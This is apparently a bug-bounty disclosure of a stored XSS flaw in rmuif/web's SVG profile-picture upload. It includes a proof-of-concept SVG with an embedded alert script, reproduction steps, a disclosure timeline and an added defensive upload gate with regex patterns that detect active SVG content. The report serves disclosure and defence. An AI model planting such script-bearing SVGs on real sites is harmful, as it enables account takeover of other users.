Cross-site Scripting (XSS) - Stored in rmuif/web

Valid

Reported on

Oct 20th 2021


Description

rmuif/web is vulnerable to stored XSS. The profile-picture upload in the settings page accepts SVG files and stores them as-is. An SVG is an XML document that may contain <script> elements, so the uploaded file is an HTML-like active document rather than a plain raster image. When the stored file URL is opened directly in a browser, the embedded JavaScript executes in the origin that serves the file.

Proof of Concept

SVG content:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

1: Save the above content into a file with an .svg extension.

2: Log in, open the settings page and upload this file as a profile picture. The upload is accepted without any check on the file's contents.

3: Open the URL of the stored file directly in the browser. The alert fires and shows the domain the file is served from, which is the origin the script runs in.

PoC video.

Impact

This vulnerability allows an attacker to execute arbitrary JavaScript in the browser of any user who opens the uploaded file's URL. If the file is served from the application's own origin, the script runs with the victim's session and can perform any action the victim can, including reading data and changing account settings, which may compromise the victim's account. If the file is served from a separate storage origin, the script is confined to that origin; the alert(document.domain) in the PoC shows which case applies.
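The root cause is that the upload path trusts the file extension and declared MIME type and never looks at the bytes. Below is an added example of the kind of gate a profile-picture upload should apply; it is not rmuif/web's code and not the fix referenced in the timeline. It sniffs the leading bytes (magic numbers) and only accepts PNG, JPEG or GIF, so any SVG, including the PoC above, is refused regardless of its declared type. It also includes a small detector for the markers that turn an SVG into a script carrier, for anyone who must accept SVG and wants to see why an allowlist for it is hard to get right. The function names, the 2 MiB size limit and the sample inputs are all assumptions made for this example.

```javascript
// Added example, not rmuif/web's code: a content-sniffing gate for profile
// picture uploads plus a detector for active content in SVG text.
// Function names, limits and sample inputs are assumptions for this example.

// Leading-byte signatures of the raster formats we are willing to store.
const MAGIC = [
  { type: "image/png",  bytes: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a] },
  { type: "image/jpeg", bytes: [0xff, 0xd8, 0xff] },
  { type: "image/gif",  bytes: [0x47, 0x49, 0x46, 0x38] }, // "GIF8"
];

function startsWith(u8, sig) {
  if (u8.length < sig.length) return false;
  return sig.every((b, i) => u8[i] === b);
}

// Returns the sniffed raster MIME type, or null when the bytes do not begin
// with a known raster signature. SVG is XML text, so it never matches.
function sniffRasterType(buf) {
  const u8 = buf instanceof Uint8Array ? buf : new Uint8Array(buf);
  for (const { type, bytes } of MAGIC) {
    if (startsWith(u8, bytes)) return type;
  }
  return null;
}

// Upload gate. `declaredType` is what the client claims (File.type in the
// browser, Content-Type on the server); it is attacker-controlled, so it is
// only used as a cross-check against what the bytes actually say.
function checkProfilePicture(buf, declaredType, maxBytes = 2 * 1024 * 1024) {
  if (buf.length === 0) return { ok: false, reason: "empty file" };
  if (buf.length > maxBytes) return { ok: false, reason: "file too large" };
  const sniffed = sniffRasterType(buf);
  if (sniffed === null) return { ok: false, reason: "not a PNG, JPEG or GIF" };
  if (declaredType !== sniffed) {
    return { ok: false, reason: `declared ${declaredType}, content is ${sniffed}` };
  }
  return { ok: true, type: sniffed };
}

// Markers that make an SVG execute script when opened as a document (step 3
// of the PoC). <script> is only one of them: event-handler attributes,
// javascript: links and embedded HTML via <foreignObject> fire just as well.
const ACTIVE_SVG = [
  /<\s*script\b/i,
  /\son[a-z]+\s*=/i,                             // onload=, onclick=, ...
  /(?:href|xlink:href)\s*=\s*["']?\s*javascript:/i,
  /<\s*foreignObject\b/i,
  /<\s*(?:iframe|object|embed)\b/i,
];

function svgHasActiveContent(svgText) {
  return ACTIVE_SVG.some((re) => re.test(svgText));
}

// Constructed sample inputs mirroring the PoC on this page.
const POC_SVG = `<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255)" />
   <script type="text/javascript">alert(document.domain);</script>
</svg>`;
const CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>';
const pocBytes = new TextEncoder().encode(POC_SVG);
// PNG signature followed by the start of an IHDR chunk length field.
const PNG_HEADER = new Uint8Array([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 0x0d]);

if (typeof require !== "undefined" && require.main === module) {
  console.log("PoC as image/svg+xml:", checkProfilePicture(pocBytes, "image/svg+xml"));
  console.log("PoC relabelled image/png:", checkProfilePicture(pocBytes, "image/png"));
  console.log("PNG header as image/png:", checkProfilePicture(PNG_HEADER, "image/png"));
  console.log("PoC has active content:", svgHasActiveContent(POC_SVG));
  console.log("Clean SVG has active content:", svgHasActiveContent(CLEAN_SVG));
}
```

The gate belongs on the server (or in the storage rules), not only in the React settings page, since a client-side check is trivially bypassed. Whatever is stored should also be served with a Content-Type derived from the sniffed bytes, X-Content-Type-Options: nosniff, and ideally from an origin that holds no session, so that even a file that slips through cannot act on the application's behalf.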

References

Disclosure timeline (relative timestamps as shown on the page):

- We have contacted a member of the rmuif/web team and are waiting to hear back (a month ago)
- rmuif/web maintainer validated this vulnerability (a month ago)
- Renan Rocha has been awarded the disclosure bounty
- The fix bounty is now up for grabs
- rmuif/web maintainer confirmed that a fix has been merged on daa247 (a month ago)
- The fix bounty has been dropped
- AccountTab.js#L141-L186 has been validated